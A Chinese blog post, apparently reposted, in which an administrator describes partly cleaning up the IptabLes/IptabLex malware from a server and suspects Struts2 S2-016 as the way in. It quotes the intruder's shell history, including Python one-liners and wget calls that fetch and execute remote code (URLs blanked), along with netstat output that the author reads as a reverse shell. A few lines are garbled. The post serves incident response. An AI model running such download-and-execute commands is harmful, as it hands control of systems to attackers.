达缇美食

全部频道

您的当前位置:首页小记IptabLes和IptabLex病毒清理过程3

小记IptabLes和IptabLex病毒清理过程3

来源:达缇美食


系统大全为您提供
 
通过netstat -anput 发现这个进程的功能应该是    TCP 这里是我的IP:59978->66.102.253.30:dvr-esm (SYN_SENT)。
tcp        0      1 这里是我的IP:41939       222.34.129.154:2804         SYN_SENT    1701/bash
这尼玛好像就是反弹shell吧。
还是看看.bash_history吧。
    973 find -name '*tomcat*'
    974 find -name 'index.jsp'
    975 ------------------------------
    976 find -name 'index.jsp'
    977 ls
    978 top
    979 ls
    980 python -c "exec(__import__('urllib').urlopen('https:///0c971e54b1eef79a').read())" -m 50
    981 python2
    982 python
    983 ls
    984 wget https://
    986 cat index.html
    987 wget https:///0c971e54b1eef79a').read())" -m 50
    998 python -c "exec(__import__('urllib').urlopen('http:///0c971e54b1eef79a').read())" -m 50
    999 pip
   1000 yum install python-zlib
他先安装了python,然后去那个URL下了个脚本,网站看了下,是个hack网站,那就是提权和做后门了吧。想再看看还有什么的时候发现只能保存1000行!!!!!
tail –100 
ar/log
cure
看看安全信息,有公网IP拼命的在尝试root的密码,而且走的是ssh进来的。当然关闭ssh相信应该是可以的。我这因为目前公网上还需要用到ssh,所以只能在hosts.deny上进行阻止该公网IP进来。
 
东北大学网络中心有常见的ssh攻击的IP地址,及一个sh脚本:
网址:http://antivirus.neu.edu.cn/scan/ssh.PHP
阻止别人的ssh连接了,但是内部的 那个进程还是一直有,一直发着这个
TCP 这里是我的IP:59978->66.102.253.30:dvr-esm (SYN_SENT)
他应该用的应该是Struts2的漏洞进入服务器里的,但是留下的那个后门,我现在还没有办法解决,
Struts2的漏洞可以看这里:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
至此,先到这里吧。最近还是再看看吧。 
  以上就是系统大全给大家介绍的如何使的方法都有一定的了解了吧,好了,如果大家还想了解更多的资讯,那就赶紧点击系统大全官网吧。 
 
本文来自系统大全http:///如需转载请注明!推荐:win7纯净版
显示全文